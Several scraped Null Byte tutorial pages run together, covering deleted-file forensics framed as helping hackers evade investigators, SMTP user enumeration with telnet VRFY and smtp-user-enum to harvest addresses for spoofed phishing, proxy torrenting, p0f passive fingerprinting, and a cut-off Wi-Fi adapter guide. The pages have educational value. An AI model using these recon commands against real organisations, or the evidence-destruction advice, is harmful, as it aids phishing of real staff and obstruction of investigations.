2:Hacking a Friend's Facebook PasswordNews:Google social web engineer Joseph Smarr talks about lessons from Google+How To:Score Free Game Product Keys with Social EngineeringSocial Engineering:The BasicsHow To:recognize Crowd Control - Part 1News:Give 'em the Bird.Boo Box Challenge:Heaven on EarthPhoto Proof:Terry Richardson is a ScumbagNews:PopCap Bought by EA, Earns $750 Million Bonus PointsXbox LIVE Achievement:How to Earn Free Microsoft Points with Social EngineeringNews:Engineering Degree Program TipsNews:UET,lahore,pakistanHow To:The Social Engineer's Guide to Buying an Expensive LaptopNews:Top 13 Google Insiders to Follow on Google+
Hack Like a Pro: Digital Forensics for the Aspiring Hacker, Part 3 (Recovering Deleted Files) Β« Null Byte :: WonderHowTo
Welcome back, my tenderfoot hackers!I recently began a newseries on digital forensicsto help tenderfoot hackers from being detected and ultimately, incarcerated. In this installment of that series, we will look at recovering deleted files. This is important to hackers because you need to know that even when you delete files on your computer or on the victim's computer, a forensic investigator can usually recover them.Windows File System'sSince most of the victim's will likely be Windows based systems, let's focus our attention on Windows systems and their file systems. Nearly all modern Windows systems use the NTFS filesystem, but older systems may still use FAT filesystem. In fact, if you are using a flash thumb drive, it is probably formatted with the older FAT file system because that would make it usable on ALL operating systems including Linux and Mac OS X.NTFSThe NTFS file system was developed for the "new" Windows that was being developed in the late 80's and early 90's, Windows NT (hence, NT File System). Microsoft turned to a group of OS developers formerly with Digital Equipment Company (now part of HP) to develop Windows NT and new robust, reliable and secure file system. This file system eventually superseded other file systems in the Windows family with the arrival of Windows 2000 and now you will only find NTFS on Windows systems.NTSF has a Master File Table (MFT) that tracks the location of every file on a hard drive. When a file is deleted, the MFT simply marks that area on the hard drive as available to be overwritten. Until that area is actually overwritten, the file remains intact on the hard drive and easily recovered. Even if it is overwritten, there may remain "slack space" if the new file is not as long as the previous file. So, for instance, if you deleted a file that was 4096kb and overwrote it with a file that 3000kb, over 1000kb would be slack space and still recoverable by a forensic investigator.FAT FilesystemFAT is a much older and simpler file system. It was the file system of the first PC's developed by IBM in 1981 using Microsoft's DOS. It has come in multiple flavors from FAT8, FAT12, FAT16 and FAT 32. It is a simple file system without all the security and other features of NTFS and Linux's ext2 and ext3. In this tutorial, we will look at recovering a deleted file from a FAT formatted flash drive, but exactly the same tools and process would apply to recovering files from NTFS, ext2, ext3, HFS, HFS+, etc.Step 1: Create a FileTo demonstrate how to recover deleted files, let's create a malicious document. We will call this document "Malicious" and create it with Notepad in Windows.This sounds like a sound, albeit ambitious plan.Step 2: Delete the FileNext, now that we have completed our plans to take over the world, let's delete the file because we no longer need it and we don't want to leave behind any evidence of our malicious plans.Right click on the malicious file and select delete. If you put the file in the Recycle Bin, you have made it even easier for the forensic investigator to recover. The Recycle Bin is actually simply a folder where the files are moved until you empty the Recycle Bin. Nothing is deleted until you empty the Recycle Bin.Step 3: Create an ImageThe first step a forensic investigator will do when examining your computer is to make bit-by-bit copy of your hard drive or in this case your flash drive. There are numerous tools that can do this and in Linux we have the dd command that does an excellent job of making bit-by-bit copies (its on all Linux distributions including BackTrack). File backups and copies are not forensically sound as they will not copy deleted files and folders and in many cases will actually change the data.Most forensic investigators use commercial tools. The two most popular being Encase by Guidance Software andForensic Tool Kitby Access Data.FTK, as it is commonly known in the industry, has afreeimager that creates a bit-by-bit copy of the drive. This imager is probably the most widely used in the industry and its price is right, so let's use it.You can download ithere.Now that have downloaded the FTK imager, we need to create a bit-by-bit image of the flash drive.Go to menu at the top of the application and select:File->Create ImageIt will open a wizard that will walk you through the process of opening a case and ask you for a case number, evidence number, examiner name, etc. Obviously, this software was designed for law enforcement and all evidence needs to be categorized and labelled.Finally, it will ask for a location of the physical drive you want to image, a destination directory and a name for the image file. When you are done with all these administrative tasks, FTK Imager will be begin the process of creating a forensically sound bit-by-bit image of your drive.Now that we've created a image of the flashdrive, we are ready to recover the deleted files.Step 4: Recover Deleted FilesThere are many tools on the market to recover deleted files and all of them are adequate to do the job. Deleted file recovery is probably the simplest of forensic tasks. Here, I will be using a trial version of RecoverMyFiles.You can download a trial versionhere.Once you have installed RecoverMyFiles, select the Start Recovery icon in the upper left corner. It will ask you to select either Recover Files or Recover Drive. Select Recover a Drive. It will then search and display all your drives like that in the screenshot below. Since we are using a forensic image, select Add Image button to the right. You will need to provide a path to your image file created with FTK.Once you select an image file, start the automatic file recovery. When the recovery is completed, you will see a screen similar to the one below.I then selected theFile Typetab above the Explorer window to categorize the files by type.As you can see, there are numerous file types recovered from this flash drive. Since our malicious document was a .txt, I have selected the TXT UTF-16 file type. It then puts all 158 .txt files on display in the upper right window. As you can see, it has recovered our malicious.txt file and everything on it. Busted!I'm hoping that this tutorial clearly showed you how simple it is for a forensic investigator to recover the files you have deleted. This should be a lesson that you need to be exceedingly cautious and when possible, overwrite any deleted files to remove evidence. In some cases, even that may not be enough to keep your files from a skilled forensic investigator.Keep coming back my tenderfoot hackers for more adventures in Hackerland!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseMagnified Hard Driveimage via ShutterstockRelatedHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 1 (Tools & Techniques)SPLOIT:Forensics with Metasploit ~ ( Recovering Deleted Files )How To:The Essential Skills to Becoming a Master HackerHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 5 (Windows Registry Forensics)Hacking Windows 10:How to Find Sensitive & 'Deleted' Files RemotelyHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 6 (Using IDA Pro)News:How to Study for the White Hat Hacker Associate Certification (CWA)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 11 (Using Splunk)News:Why YOU Should Study Digital ForensicsHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 8 (More Windows Registry Forensics)How To:Become a Computer Forensics Pro with This $29 TrainingHack Like a Pro:Digital Forensics Using Kali, Part 1 (The Tools of a Forensic Investigator)How To:Recover deleted text messages on an iPhoneHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 12 (Windows Prefetch Files)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 7 (Windows Sysinternals)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 2 (Network Forensics)How To:Recover Deleted Files & Photos on AndroidHow To:Delete Files on Android So They Can't Ever Be RecoveredHow To:Recover deleted email in Outlook, EudoraHow To:Restore Permanently Deleted Files with RecuvaHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 10 (Identifying Signatures of a Port Scan & DoS Attack)Hack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 15 (Parsing Out Key Info from Memory)TypoGuy Explaining Anonymity:Your Real IdentityHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 14 (Live Memory Forensics)How To:Recover Permanently Deleted Files Through RecuvaNews:Airline Offers Frequent Flyer Miles to HackersHow To:Deleting Your Files CompletelyHack Like a Pro:Digital Forensics for the Aspiring Hacker, Part 9 (Finding Storage Device Artifacts in the Registry)News:What to Expect from Null Byte in 2015How To:Don't Get Caught! How to Protect Your Hard Drives from Data ForensicsHow To:Recover Deleted Files in LinuxGoodnight Byte:HackThisSite Walkthrough, Part 8 - Legal Hacker TrainingHow To:Permanently Delete Files to Protect Privacy and PasswordsHow To:Recover Deleted Files in WindowsGoodnight Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingGoodnight Byte:HackThisSite Walkthrough, Part 10 - Legal Hacker TrainingCommunity Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsGoodnight Byte:HackThisSite Walkthrough, Part 6 - Legal Hacker Training
Hack Like a Pro: How to Extract Email Addresses from an SMTP Server Β« Null Byte :: WonderHowTo
Welcome back, my budding hackers!If we are considering asocial engineering attackagainst a target, we are probably going to need email addresses. By having the email addresses of people within an organization, we can tailor our social engineering attack to particular people and circumstances within that organization (e.g., a sales report to the sales department) and maybe spoof the email address of a colleague within the organization. In this way, they are more likely to click on a link or open a document that we send them.There are multiple ways of collecting email addresses includingMaltego, an email harvester, and others, but what if we could go directly into the organization's SMTP server and ask it if an email address exits? Wouldn't that be best and most reliable method?Background on SMTPAs you know, SMTP stands for Simple Mail Transport Protocol and operates on port 25. Unlike POP3 and IMAP that operate over ports 110 and 143, respectively, SMTP is a server-to-server protocol. Clients use POP3 or IMAP to retrieve or send messages to the SMTP server, while the SMTP server then communicates to other SMTP servers.The SMTP server, obviously, maintains a database of every email address in the organization that it must send and receive email for. It is this database that we want to access and query.To find SMTP servers you can useNmapor another scanning tool and look for servers with port 25 open. If port 25 is open, it is likely an SMTP server. In addition, you can useDNSquerying to find the IP address of its SMTP server.SMTP CommandsThe SMTP protocol, like so many other protocols, has its own subset of commands. Here are a few of the most important SMTP commands.HELO- This is the command that the client sends to the server to initiate a conversation. Generally, the IP address or domain name must accompany this command, such as HELO 192.168.101 or HELO client.microsoft.com.EHLO- This command is the same as HELO, but communicates to the server that the client wants to use Extended SMTP. If the server does not offer ESMTP, it will still recognize this command and reply appropriately.STARTTLS- Normally, SMTP servers communicate in plaintext. To improve security, the connection between SMTP servers can be encrypted by TLS (Transport Layer Security). This command starts the TLS session.RCPT- Specifies the email address of the recipient.DATA- Starts the transfer of the message contents.RSET- Used to abort the current email transaction.MAIL- Specifies the email address of the sender.QUIT- Closes the connection.HELP- Asks for the help screen.AUTH- Used to authenticate the client to the server.VRFY- Asks the server to verify is the email user's mailbox exists.Step 1: Fire Up Kali & Open a TerminalNow that we covered the basics of SMTP, let's see if we can use this knowledge to hack the SMTP server to extract email addresses. Let's fire upKaliand open a terminal.Step 2: Telnet into the SMTP ServerOur next step is to see whether we can manually connect to the SMTP server using telnet.kali > telnet 192.168.1.101 25As you can see, we have successfully connected to the Metasploitable server via telnet.Step 3: Manually Try Email AddressesNow that we are connected via telnet to the SMTP server, we can use the SMTP commands listed above to query the server. Most importantly, we want to use the VRFY (verify) command. Using this command, followed by the email user name, will prompt the server to verify whether the user account exits, such as:> VRFY sysAs you can see in the screenshot above, I tried users:sysadminadministratornullbyterootThe server verified that "sys" and "root" have email accounts on the server. Great!Step 4: Use Smtp-User-EnumAs you could see in Step #3, we can manually query the SMTP server to see whether a particular email address exists. Wouldn't it be easier if we had a script that did this automatically? Fortunately, we do! It's calledsmtp-user-enumand it's built into Kali.We can find it at Applications -> Kali Linux -> Information Gathering - SMTP Analysis -> smtp-user-enum.When we click on it, a help screen like that below opens. Note that the basic syntax for using this tool to find email users is:kali > smtp-user-enum -M VRFY -U <userlist> -t <target IP>Now let's construct a command to use against the Metasploitable SMTP server. We can use any of the wordlists in Kali,createour own, or download any of thousands available on the Internet. I've decided to try one built into Kali at:/usr/share/fern-wifi-cracker/extras/wordlistUsing it, my command becomes:kali > smtp-user-enum -M VRFY -U /usr/sharefern-wifi-cracker/extras/wordlist -t 192.168.1.101As you can see in the screenshot below, we started it running and it first displays the scan information.Then, the users found.Now that we know what users are on that organization's email server, we can send social engineering emails to them or spoof their email addresses and send social engineering emails to their colleagues.Keep coming back, my budding hackers, as we continue to explore the art and technique of hacking!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Brute-Force Email Using a Simple Bash Script (Ft. THC Hydra)How To:Add Your iCloud Email Account to Your Galaxy Note 3 or Other Android DeviceHow To:Set up a Yahoo email account on your iPod TouchHow To:Set up an email account in MS OutlookHow To:Setup a new e-mail account in Outlook 2003How To:Configure Microsoft Entourage for a Gmail accountHow To:Set-up a new email address in MS Outlook ExpressHack Like a Pro:Abusing DNS for ReconnaissanceHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)How To:Set up POP3 settings for Outlook 2003/Outlook ExpressHack Like a Pro:The Ultimate Social Engineering HackHow To:Make Your Remote Screenshot Captor(Python)How To:Enable a Live/Hotmail account in Mac's MailHow To:Hide @iCloud, @Me & Custom Aliases from Your Mail App's 'From' Field on Your iPhoneHow To:Change Your FaceTime Caller ID to an Email Address or Phone NumberHack Like a Pro:How to Spy on Anyone, Part 2 (Finding & Downloading Confidential Documents)How To:Set-up your Gmail account with OutlookHow To:Stop Gmail from Automatically Loading Images in Your EmailsHack Like a Pro:How to Spear Phish with the Social Engineering Toolkit (SET) in BackTrackHow To:Make a Gmail Notifier in PythonHow To:Code a Basic TCP/IP Client & Server Duo in PythonNews:ShouldIChangeMyPassword.comHow To:Make a Change-of-IP Notifier in PythonHow To:Spider Web Pages with Nmap for SQLi VulnerabilitiesDon't Get Doxed:5 Steps to Protecting Your Private Information on the WebHow To:Fix Your Notification Settings in Google+ PagesGoodnight Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsThe Ultimate Guide:Diagnosing & Fixing Connection Issues, Part IINews:How-To-Generate Thousands Of Valid Email IDsGoodnight Byte:HackThisSite Walkthrough, Part 4 - Legal Hacker TrainingHow To:Really Connect Your Words with Friends Mobile Account to FacebookMastering Security, Part 2:How to Create a Home VPN TunnelNews:Learning (and Teaching) The Use of BCC in EmailsNews:Tips and Tricks for GmailNews:Basic Email Etiquette
How to Hide Your IP Address with a Proxy Server Β« Null Byte :: WonderHowTo
Proxies can be quicker to use than a VPN for specific applications, like web browsers or torrent clients. Both services will hide your true IP address, but a VPN is slowed down because it encrypts all data through a VPN network, while a proxy just acts as a middleman for fetching and returning requests from a server on your behalf. When speed is needed, go proxy.A proxy hides your IP address but leaves behind some breadcrumbs, because most proxies have a cache system that will log browser history, passwords, and other data. There are some encryption options with proxies, but they aren't very helpful since there is still a log service. But these breadcrumbs are what makes proxies fast.Since proxy servers cache webpages, they can increase the speed of downloading documents and websites because the proxy server does a local cache of previously downloaded requests from other clients first. In comparison, a VPN is a direct tunnel to the endpoint with encryption, which really slows things down.Don's Miss:How to Evade Detection Using ProxychainsPrivate Internet Access(PIA) is a popular and well-trusted VPN service starting at $2.91/month, one which we've covered before in the past forsecuring IoT and media devices. A VPN subscription to them also includes aPIA proxyservice. Using their proxy for file-sharing allows you to download media like disk images securely without needing to route all of your traffic through a VPN, so you can still watch Netflix or browse the internet while you torrent.In this tutorial, we will create an application-specific tunnel for downloading your content, allowing you to continue using the internet for other tasks or games uninterrupted and without extended ping times. Like mentioned before, proxy servers are faster because they do not come with encryption. PIA's proxy service does offer encryption if that's something you're interested in.Step 1: Download & Install Β΅TorrentΒ΅Torrent is a torrent client, which means it uses a peer-to-peer network to download files. While this is a great, fast way to download open-source software like Kali Linux disk images, it also isn't always wise to download hacking tools from your home IP address. For those wishing to download Tor or Kali Linux withoutending up on a government list, a proxy can help protect your privacy.This setup will work for many different torrent clients, but to keep this tutorial as cross-platform as possible, we will be using Β΅Torrent. You can download the software fromits website, and it should auto-select the client based on the operating system you are using. Go ahead and press the "Get Β΅Torrent" button (the free one, obviously), and the download will start automatically.After downloading, it's time to install. When we double-click the installer, a configuration wizard will pop up. We want to hit the "Next" button in the bottom-right corner. After that, the end-user license agreement will spring up, and so we want to "Accept" that.It wants to install a Yahoo extension on your default web browser, and we don't want that. Go ahead and "Decline" that, and then the final installation steps will occur automatically.Don't Miss:How to Make a Proxy Server in PythonStep 2: Configure Β΅TorrentFirst, let's open up Β΅Torrent. We want to click the "Options" tab and then select "Preferences" from the drop-down menu. ThePreferenceswindow will pop up, and next, we will want to click on the "Connection" tab. Once there, we will see theProxy Serverfield, as seen below. It's asking for proxy credentials, so we'll need to create those first.Step 3: Generate Proxy CredentialsLet's open up a web browser and log into ourPIA VPN client. After you log in, scroll down until you see thePPTP/L2TP/SOCKS Username and Passwordsection. These username and password pairs are generated for use with PPTP, L2TP, and Proxy SOCKS connections. Write down or save the username and password for the next step.Step 4: Configure the Proxy ServerReturn to Β΅Torrent's "Connection" settings, and change theProxy Servertype to "Socks5." Check the boxes next to "Authentication" and "Use proxy for peer-to-peer connections," then grab that username and password from PIA client page and stick them in theUsernameandPasswordfields under theProxy Serversection.Next, for theProxyfield, we want to input the address "nl.privateinternetaccess.com," and for thePortnumber, we want to change it to port 1080. We are using this port because PIA servers assign this port to their proxy servers. Press "Apply," and then "OK."Step 5: Torrent a File via ProxyNow, let's download our target torrent file. In this case, our target will be the free live image of our favorite pentesting OS, Kali Linux. Torrenting files is often quicker than downloading the same file from a web browser, as a peer-to-peer download isn't limited by how far the websites download server is.You can navigate to the torrent file on theKali downloads page. We are going to select the "Kali 64-bit" version using the "Torrent" download. A file with a name like "kali-linux-2017.2-amd64.torrent" should download.Don't Miss:Set Up SoftEther VPN on Windows to Keep Your Data SecureGo ahead and either save or open the TORRENT file with the Β΅Torrent client. Then, right-click on the "kali-linux-20xx-.x-xxxxx" and select "Force Start" to prioritize and initialize the torrent. If the torrent does not start, then the proxy settings were not correct or your subscription had expired. If it succeeds, you should see something like the screen below.Here we see a successful connection as a file downloads.Once the connection levels off, your download should work normally. As soon as it's finished, you'll have downloaded your first piece of data via proxy.Proxies Have Even More Beneficial UsesIn the end, we connected our torrent client to redirect our internet traffic to Private Internet Access's proxy servers. This ensured that our private information is concealed while torrenting. Since we did this in an application-specific way, we are also able to use this configuration for web browsers and other application that allow proxy redirection settings.Depending on where the proxy is, we can also get around geolocation filters to access regionally-restricted websites. This useful ability can fight censorship and be used to get around many types of network restrictions.Some organizations, like school and governments, use proxies in their network for almost the exact opposite reason. They configure proxies to actually filter blacklisted websites, like porn or social media, so people in the organization do their work and without getting distracted.In that example, a client sends a request to the proxy server to fetch a file or webpage. When the proxy server receives the data, it will interpret the request and decide if that data will be sent back, depending on the settings and rules applied to the proxy server, such as blocking pornography. The client will then receive the file or webpage they requested, provided it passed the proxy filter.Again, since proxy servers also cache webpages, if an organization's network has hundreds or thousands of users searching for the same thing, it cuts down the search index times on the network and reduces upstream demand.Have any questions? Comment below or hit me up on [email protected]'t Miss:Chain VPNs for Complete AnonymityFollow Null Byte onTwitterandGoogle+Follow WonderHowTo onFacebook,Twitter,Pinterest, andGoogle+Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo by Kody/Null Byte; Screenshots by Nitrous/Null ByteRelatedHow To:Use a proxy with Firefox to hide your IP addressSPLOIT:How to Make a Proxy Server in PythonHow to Hack Wi-Fi:Evading an Authentication Proxy Using ICMPTXThe Hacks of Mr. Robot:How Elliot & Fsociety Made Their Hack of Evil Corp UntraceableNews:Reality of VPNs, Proxies, and TorHow To:Get the Backend IP of a Server (Part 1)Hacker Fundamentals:The Everyman's Guide to How Network Packets Are Routed Across the WebHow To:Bypass School Internet Filters to Unblock WebsitesHack Like a Pro:Linux Basics for the Aspiring Hacker, Part 6 (Networking Basics)Hack Like a Pro:Abusing DNS for ReconnaissanceHack Like a Pro:How to Evade Detection Using ProxychainsHow To:Change your IP address in five different waysHacker Fundamentals:A Tale of Two StandardsHacking Windows 10:How to Turn Compromised Windows PCs into Web ProxiesHow To:Facebook Credentials RevisitedHow To:Chain Proxies to Mask Your IP Address and Remain Anonymous on the WebNews:Anonymity, Darknets and Staying Out of Federal Custody, Part One: Deep WebHow To:Make a Change-of-IP Notifier in PythonMastering Security, Part 2:How to Create a Home VPN TunnelHow To:Code a Basic TCP/IP Client & Server Duo in PythonHow To:Bypass a Local Network Proxy for Free InternetNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Two: Onions and DaggersHow To:Assign a Static IP Address in Windows 7How To:Hide your IP address using IP Hider 4.0How To:Run a Free Web Server From Home on Windows or Linux with ApacheHacker Fundamentals:A Gentle Introduction to How IP Addresses WorkHow To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop ItHow To:Use a proxy serverNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Four: The Invisible InternetHow To:Spider Web Pages with Nmap for SQLi Vulnerabilities
Hack Like a Pro: How to Conduct Passive OS Fingerprinting with p0f Β« Null Byte :: WonderHowTo
Welcome back, my novice hackers!I have tried to emphasize throughout this "Hack Like a Pro" series thatgood reconnaissance is criticalto effective hacking. As you have seen in many of these hacks, the techniques that we use are VERY specific to the:Operating system,Service pack,Installed applications,Open ports,Running services, andEven language.I have shown you how to use a few of the best reconnaissance tools,hping,nmap, andxprobe, but each of these has a weaknessβ€”they are active. In other words, you have to send packets at the potential victim to get a read on their attributes. This, of course, risks detection and whenever you send packets to a target, your IP address is attached (unless you spoof your IP address, but then you wouldn't get a response from the target).Using p0f for Passive ReconIn the interest of remaining as stealthy as possible, you want to be able to determine the operating system of a potential target without touching it. That's the beauty ofp0f, which uses attributes of the packets on the wire to determine the operating system that sent the packet.As you probably know, each operating system implements the TCP/IP stack in slightly different ways, and as a result, the TCP packets sent via that OS have slightly different attributes. If we can grab a packet off the wire, examine it, and look for these attributes, we can compare them to a database of attributes and determine with a relatively high degree of accuracy what operating system sent the packet.It's important note, though, that the reliability of passive recon is lower than active recon.Taking a Look at Our TCP/IP PacketThe image below is of a TCP/IP header. The IP header is shaded in yellow and the TCP header is in white. I have circled four fields of that header that are critical in determining the operating system that generated the packet.First: Type of Service (TOS)Their are four different values here.Minimize DelayMaximize ThroughputMaximize ReliabilityMinimize Monetary CostSecond: Flags (DF) of the IP HeaderDon't confuse this with the SYN, FIN,RST, ACK, URG, and PSH flags in theTCPheader. This is the Fragment or Don't fragment flag. This flag is meant to indicate to the receiving system whether the packet has been fragmented.Third: The Time to Live (TTL)This indicates the default setting for the TTL of the packet. Each operating system sets the TTL to maximum number of hops that packet can traverse before it times out. Generally, Windows systems have this set at 32 while Linux systems have the TTL set to 64.Fourth: The Windows FieldThis is probably most important. The Window field sets the size of the buffer of the sending system. This is the way that TCP maintains flow control. This field alone varies the most among operating systems. If you can find this value, you have about 70-80% chance of determining the operating system that sent the packet.Now that have an idea of how p0f works, let's put it to work.Step 1: Open p0fLet's start by firing up BackTrack and then opening p0f. We can do that by going toBackTrack->Information Gathering->Network Analysis->OS Fingerprinting, and finally,p0f.Image viawonderhowto.comWhen we do so, p0f will open a terminal with a help screen like that below.Step 2: Start p0fThere is a lot of information in that help screen, much of which we can leave for another tutorial. To get p0f running, we simply need to type the command (p0f) then-i(for interface), the name of the interface we want to listen on (eth0here) and then the-vand-toptions.bt > p0f -i eth0 -vtWhen we do so, p0f will begin to listen on that interface (as shown above) for any traffic.Step 3: Send TrafficNow, let's send some traffic from a Windows XP system. I simply usednetcatto connect to port 80 on our BackTrack system.As you can see above, p0f identified it accurately as Windows XP SP1. Also note that it identified the type of connection I was using, in this case "ethernet/modem".Step 4: Send Windows 7 TrafficNow, let's send some Windows 7 traffic. Once again, I simply used netcat to connect to port 80. This time, p0f is baffled. It gives us the signature of the packet, but then identifies it as Windows, but doesn't know what version.It was able to identify the connection from an ethernet/modem connection.The problem with the Windows 7 identification, and for that matter anything beyond Windows Vista, is that the developer of p0f stopped updating the signatures in 2006. Any new signatures for new operating systems aren't included in this p0f 1.8 on BackTrack.Step 5: View OS SignaturesP0f stores the operating system signatures in a file at/etc/p0f/p0f.fp. Let's take a look at that file.more /etc/p0f/p0f.fpThis file has a lot of information on p0f, but also includes the operating system signatures. If you scroll down through this file about 60% of the way, you will come to the individual signatures of each operating system.In the screenshot above, you can see the Windows operating systems signatures. You could simply add the signature from your Windows 7 operating system to this file and it would then recognize it the next time a Windows 7 system packet was seen on the wire by p0f.Good News!The good news is that the developer of p0f,Michael Zalewski, has recently releasedp0f version 3that has up-to-date signatures and new features!Now that you understand how p0f works, we will download, extract, and compile the new version of p0f in a future tutorial, so keep coming back my novice hacker!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseFingerprint scanimage via ShutterstockRelatedHack Like a Pro:How to Use the New p0f 3.0 for OS Fingerprinting & ForensicsHack Like a Pro:How to Conduct OS Fingerprinting with Xprobe2How To:Hack Your Firefox User Agent to Spoof Your OS and BrowserNews:How to Study for the White Hat Hacker Associate Certification (CWA)How To:Fingerprint-Lock Apps on Android Without a Fingerprint ScannerHack Like a Pro:How to Conduct Passive Reconnaissance of a Potential TargetHow To:Use BeEF and JavaScript for ReconnaissanceHow To:Use Your Fingerprint Scanner to Do Almost Anything with TaskerHow To:Lock Any App with a Fingerprint on Android MarshmallowHow To:Lock Apps Using Your Samsung Galaxy S6’s Fingerprint ScannerNews:Latest Huawei Mate 20 Rumors & Leaks β€” Face ID, Massive Battery & Wireless ChargingHow To:Obscure your OS fingerprintHow To:Unlock Your Mac Using Your iPhone's Touch ID or Lock Screen PasscodeAndroid Basics:How to Unlock Your Phone with Your FingerprintHow To:Get the Pixel's Fingerprint Swipe Notification Gesture on Other DevicesNews:10 Great 99 Cent Apps You Need on Your Android Right NowNews:Researchers Find 'MasterPrints' That Can Bypass Your Phone's Fingerprint ScannerNews:OnePlus 5 Looks to Have a Rear Fingerprint SensorHow To:Turn Off Your Android's Screen with Your Fingerprint ScannerHow To:This Hack Lets You Touch Your Galaxy's Home Key Instead of Pressing ItHow To:Make the Fingerprint Scanner Work Faster on Your Galaxy DeviceHow To:Secure Any Android App with Your FingerprintNews:New Biometrics Update Makes the Galaxy S10's Fingerprint Scanner 4 Times FasterHow To:Use All 10 Fingerprints for Touch ID on Your iPhone β€” Not Just 5 of ThemHow To:Use Your Phone's Fingerprint Scanner to Unlock Your Windows PCNews:Google Pixel's Pros & ConsNews:You Can Get a OnePlus 7 Pro with INSANE Specs for the Price of theXRor S10eHack Like a Pro:The Hacker MethodologyHow To:Unlock Your Fingerprint-Protected Galaxy S5 Using Only One HandHack Like a Pro:How to Fingerprint Web Servers Using HttprintHack Like a Pro:How to Conduct Active Reconnaissance and DOS Attacks with NmapHow To:Earn the 'Passive Aggressive' Achievement in RageNews:What Hand Do I Read, And Why ?News:Fingerprint LibraryVaccine bombshell:Baby monkeys develop autism after routine CDC vaccinationsNews:Hack Your Computer's BIOS to Unlock Hidden Settings, Overclocking & MoreNews:New Apps Let You Sign into Bank of America, Chase, & State Farm with Your FingerprintNews:Obama and Congress Approve Resolution that Supports UN Internet TakeoverNews:Unknown, but They Shouldn't Be.News:Fantasia 2000 (2000)
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019 Β« Null Byte :: WonderHowTo
To hack a Wi-Fi network using Kali Linux, you needyour wireless cardto support monitor mode and packet injection. Not all wireless cards can do this, so I've rounded up this list of 2019's best wireless network adapters for hacking on Kali Linux to get you started hacking both WEP and WPA Wi-Fi networks.Wi-Fi Hacking for BeginnersKali Linux is by far the best supported hacking distro for beginners, and Wi-Fi hacking on Kali (previously called BackTrack) is where I started my own journey into hacking. In order to hack Wi-Fi, you will quickly learn that a wireless network adapter supporting packet injection and monitor mode is essential. Without one, many attacks are impossible, and the few that work can take days to succeed. Fortunately, there are several good adapters to choose from.Don't Miss:Select a Field-Tested Kali Linux Compatible Wireless AdapterA range of Kali Linux compatible network adapters.Image by SADMIN/Null ByteIf you're new to hacking Wi-Fi, Null Byte'sKali Pi hacking platformis a great way to get started hacking on Kali Linux for little investment. Any of the wireless network adapters on this list can be combined with a Raspberry Pi to build your own Wi-Fi hacking computer.A Raspberry Pi with a supported network is a powerful, low-cost Kali Linux hacking platform.Image by SADMIN/Null ByteDon't Miss:Set Up a Headless Raspberry Pi Hacking Platform Running KaliWhat's so great about wireless network adapters? By swapping out the antenna or adapter type, we can target different kinds of networks. We can even target far-away networks with the addition of special super long-range directional antennaslike the Yagi antenna($91.99).Chipsets Supported by Kali LinuxSo how do you pick the best wireless network adapter for hacking? If you're hacking on Kali, certain chipsets (the chip that controls the wireless adapter) will work without much or any configuration needed.Atheros AR9271 chipset inside the ALFA Network AWUS036NHA.Image by Maintenance script/WikidevChipsets that work with Kali include:Atheros AR9271Ralink RT3070Ralink RT3572Realtek 8187L (Wireless G adapters)Realtek RTL8812AU(newly in 2017)my research also suggests theRalink RT5370Nis compatibleIn 2017, Kali Linux began supporting drivers for theRTL8812AUwireless chipsets. These drivers are not part of the standard Linux kernel and have been modified to allow for injection. This is a big deal because this chipset is one of the first to support 802.11 AC, bringing injection-related wireless attacks to this standard.Kali Linux compatible adapters.Image by SADMIN/Null ByteAdapters That Use the Ralink RT3070 ChipsetThe Alfa AWUS036NH 2.4 GHz($31.99 on Amazon)The Alfa AWUS036NH is a b/g/n adapter with an absurd amount of range. This is amplified by the omnidirectional antenna and can be paired with aYagi($29.95) orPaddle($23.99) antenna to create a directional array.The AWUSO36NH.Image by SADMIN/Null ByteThe Alfa AWUS036NEH 2.4 GHz($29.99 on 